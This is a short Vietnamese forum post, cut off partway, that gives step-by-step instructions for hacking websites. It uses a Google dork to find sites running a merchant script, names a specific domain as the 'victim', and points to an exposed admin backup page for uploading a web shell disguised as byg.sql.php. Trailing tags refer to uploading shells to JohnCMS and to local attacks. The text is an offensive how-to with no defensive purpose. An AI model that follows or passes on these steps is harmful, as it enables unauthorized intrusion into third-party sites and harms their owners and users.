B1. Sử dụng dork sau vào google
allinurl:"index.php?Act=Merchants"
B2. Chọn 1 victim bất kỳ
http://www.vhmnetwork.com/index.php?Act=Merchants
B3. Thay đường path trên thành:
http://www.vhmnetwork.com/admin/backupstart.php
B4. Up shell có dang .sql.php, ví dụ: byg.sql.php
B5. Vào đường...
Admin
Thread
hdbugtimfrumhd up sell lên jonhcms
http tuoitreit vnthreads5911 huong dan bug va khai thac up shell html
hướng dẫn local attack byg
huong dan up sell
huong dan up shell johncms